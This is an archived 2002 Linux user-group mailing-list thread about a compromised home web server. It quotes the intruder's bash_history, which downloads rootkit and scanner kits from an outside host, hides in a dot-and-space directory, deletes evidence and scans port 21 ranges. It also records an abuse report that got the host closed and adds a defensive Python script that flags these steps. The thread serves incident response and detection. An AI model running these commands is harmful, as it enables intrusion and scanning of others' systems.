[Fwd: RE:Fwd: Compromised Linux Box [#7826335]] (Response from hypermart.net)


Subject: [Fwd: RE:Fwd: Compromised Linux Box [#7826335]] (Response from hypermart.net)
From: Buddha (buddha@gci.net)
Date: Tue Apr 23 2002 - 18:47:03 AKDT


Thought the group might be interested in this response from hypermart.net
after I took it upon myself to forward the info that Alan posted. One less
resource for that black hat to use against us.

-Buddha

-------- Original Message --------
Subject: RE:Fwd: Compromised Linux Box [#7826335]
From: abuse@hypermart.net
Date: Tue, April 23, 2002 1:09 pm
To: buddha@gci.net

Hello,

Thanks for the information! We've closed this account.

Thank you for contacting our customer service group. Please let us know
if there is anything we can do to help you in the future.

Do you have a comment or suggestion? If so, we would be glad to hear it.
Please forward your thoughts and ideas to feedback@hypermart.net.

Jesse

--Original Message--

Hello,

I belong to a Linux mail list and this one came over the wire today. I
think you should have a look at what's contained in the
http://cage.hypermart.net site as it looks like a bunch of hacker tools.

Thanx,
-Jim "Buddha" McMorris

-------- Original Message --------
Subject: Compromised Linux Box
From: Alan Caruth <saono@artificiallives.com>
Date: Mon, April 22, 2002 2:18 pm
To: aklug@aklug.org

Hello all,
A coworker has a webserver running on his home network which has a fairly
default Red Hat install on it. He opened up FTP without thinking, and within
a short timeframe he found that he had been compromised. The person didn't
clean out any logs after he was done, so it was fairly easy to track what he
did.

I figured y'all might like to see the bash_history on this one. From what
my coworker has said so far, after looking at his other logs, the attack
came from an Asian nation IP address. The person who hacked the machine
has bunches of files on his website in case anyone is interested in
finding out what all he did (or might do) in any more detail.

---bash_history on
wget
wget cage.hypermart.net/LchRk.tgz
tar zxvf LchRk.tgz
cd cage
..../fuckit
rm -rf LchRk.tgz
rm -rf cage
wget cage.hypermart.net/cage.tgz
tar zxvf cage.tgz
cd cage
..../install
cd /usr/bin/".. "
ls
wget cage.hypermart.net/3rwu2.tgz
tar zxvf 3rwu2.tgz
rm -rf 3rwu2.tgz
..../startwu 199.112.0.0 21
..../startwu 128.12.0.0 21
..../startwu 128.12.100.0 21
..../startwu 128.12.154.0 21
..../startwu 128.95.0.0 21

--bash history off

Have a good one.
-Alan Caruth

---------
To unsubscribe, send email to <aklug-request@aklug.org>
with 'unsubscribe' in the message body.

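Added triage example (my own, not code from the thread, from the attacker's kit, or from hypermart.net): a Python 3.8+ script that replays the posted bash_history through a small tagger for the download / unpack / hide / scan chain, and walks a directory tree for the dot-and-space hiding trick the attacker used (`/usr/bin/".. "`). The history text is copied from Alan's post; the temporary directory tree the check runs against is constructed for the demo, and the tag names and regexes are my own choices.

```python
import os
import re
import tempfile

# bash_history exactly as posted in the thread (the attacker's session).
SAMPLE_HISTORY = """\
wget
wget cage.hypermart.net/LchRk.tgz
tar zxvf LchRk.tgz
cd cage
..../fuckit
rm -rf LchRk.tgz
rm -rf cage
wget cage.hypermart.net/cage.tgz
tar zxvf cage.tgz
cd cage
..../install
cd /usr/bin/".. "
ls
wget cage.hypermart.net/3rwu2.tgz
tar zxvf 3rwu2.tgz
rm -rf 3rwu2.tgz
..../startwu 199.112.0.0 21
..../startwu 128.12.0.0 21
..../startwu 128.12.100.0 21
..../startwu 128.12.154.0 21
..../startwu 128.95.0.0 21
"""

_FETCH = re.compile(r"^(?:wget|curl|ftp)\s+(\S+)")        # pull a kit down
_TAR = re.compile(r"^tar\s+(-?\S+)\s+(\S+)")               # flags, archive
_RM = re.compile(r"^rm\s+-rf\s+(\S+)")                      # remove the evidence
_CD = re.compile(r"^cd\s+(.+)$")
_RUN_LOCAL = re.compile(r"^\.+/(\S+)")                      # ./install, ..../fuckit
_SCAN = re.compile(r"(\d{1,3}(?:\.\d{1,3}){3})\s+(\d{1,5})\s*$")  # <net> <port>
_DOT_SPACE_ONLY = re.compile(r"^[.\s]+$")


def is_suspicious_name(name):
    """Directory names made only of dots/whitespace, or padded with whitespace,
    are invisible or ambiguous in a casual `ls` (".. ", "...", " ")."""
    if name in (".", ".."):
        return False                      # the real current/parent entries
    if _DOT_SPACE_ONLY.match(name):
        return True
    if name != name.strip():
        return True                       # leading/trailing whitespace
    return any(ord(c) < 32 for c in name)  # control characters


def triage_history(lines):
    """Tag each history line that fits the fetch / unpack / hide / scan chain.
    Returns (line_no, tag, detail) tuples; untagged lines are skipped."""
    findings = []
    for n, raw in enumerate(lines, 1):
        line = raw.rstrip("\n")           # not strip(): that would eat '.. '
        if not line.strip():
            continue
        if m := _FETCH.match(line):
            findings.append((n, "fetch", m.group(1)))
        elif (m := _TAR.match(line)) and "x" in m.group(1):
            findings.append((n, "unpack", m.group(2)))
        elif m := _RM.match(line):
            findings.append((n, "cleanup", m.group(1)))
        elif m := _CD.match(line):
            # drop shell quotes so /usr/bin/".. " yields the basename '.. '
            target = m.group(1).replace('"', "").replace("'", "")
            if is_suspicious_name(os.path.basename(target)):
                findings.append((n, "cd-hidden", target))
        elif m := _SCAN.search(line):
            findings.append((n, "scan", (m.group(1), m.group(2))))
        elif m := _RUN_LOCAL.match(line):
            findings.append((n, "run-local", m.group(1)))
    return findings


def find_hidden_dirs(root):
    """Walk `root` and return directories whose name looks like a hiding spot."""
    hits = []
    for dirpath, dirnames, _files in os.walk(root):
        for d in dirnames:
            if is_suspicious_name(d):
                hits.append(os.path.join(dirpath, d))
    return sorted(hits)


def demo_hidden_dir_check():
    """Constructed tree mimicking the post's /usr/bin/".. " plus a decoy;
    returns the flagged paths relative to the temp root."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "usr", "bin", ".. "))
        os.makedirs(os.path.join(root, "usr", "bin", "normal"))
        os.makedirs(os.path.join(root, "tmp", "..."))
        return sorted(os.path.relpath(h, root) for h in find_hidden_dirs(root))


if __name__ == "__main__":
    for finding in triage_history(SAMPLE_HISTORY.splitlines()):
        print(*finding)
    print(demo_hidden_dir_check())
```

On a real box you would point `find_hidden_dirs` at `/usr`, `/lib`, `/dev`, `/var` and the like rather than a temp tree, and you would read the history from the disk image, not from a string. Two details matter in practice: whitespace-padded names vanish under plain `ls` and look identical to `..` under `ls -la`, so use `ls -Q` or `find -name '.. *'` when eyeballing; and never `.strip()` whole history lines before matching, or the trailing space that makes `".. "` suspicious disappears before you ever see it.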



This archive was generated by hypermail 2a23 : Tue Apr 23 2002 - 18:43:51 AKDT